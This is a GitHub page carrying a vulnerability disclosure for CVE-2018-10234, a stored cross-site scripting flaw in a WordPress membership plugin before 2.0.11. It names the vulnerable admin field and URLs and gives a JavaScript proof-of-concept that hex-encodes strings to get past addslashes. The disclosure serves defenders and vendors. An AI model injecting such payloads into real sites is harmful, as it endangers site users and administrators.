Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
write-ups/CVE-2018-10234/
write-ups/CVE-2018-10234/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2018-10234

[Suggested description]

Authenticated Cross site Scripting exists in the User Profile & Membership plugin before 2.0.11 for WordPress via the
"Account Deletion Custom Text"
input field on the wp-admin/admin.php?page=um_options&section=account page.

[Additional Information]

In order to execute javascript payloads with strings you need to apply hex encoding because of addslashes like:

<script>
    function hex2a(hexx) {
        var str = 0;
        for (index = 0, len = hexx.length; index < len; ++index) {
        var hex = hexx[index].toString(16);

        for (var i = 0; i < hex.length; i += 2)
            str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
        }
        return str.slice(1);
    }

    var decode = [0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f]

    var string = hex2a(decode);
    alert(string);
</script>

[Vulnerability Type]

Cross Site Scripting (XSS)

[Vendor of Product]

https://ultimatemember.com/

[Affected Product Code Base]

User Profile & Membership plugin for WordPress - All versions <  2.0.11

[Affected Component]

User Profile & Membership plugin for WordPress

[Attack Type]

Local

[CVE Impact Other]

Stored Cross Site Scripting

[Attack Vectors]

Authenticated attackers could abuse the "Account Deletion Custom Text"
input field on the following page:

"http://<target/wp-admin/admin.php?page=um_options&section=account"

to inject malicious javascript. Whenever a victim would visit the
page: 

"http://<target/account/" to manage their account details the

malicious javascript will be executed against the Wordpress
users/administrators.

[Has vendor confirmed or acknowledged the vulnerability?]

true

[Discoverer]

Riccardo ten Cate

[Reference]

https://github.com/RiieCco/write-ups/tree/master/CVE-2018-10234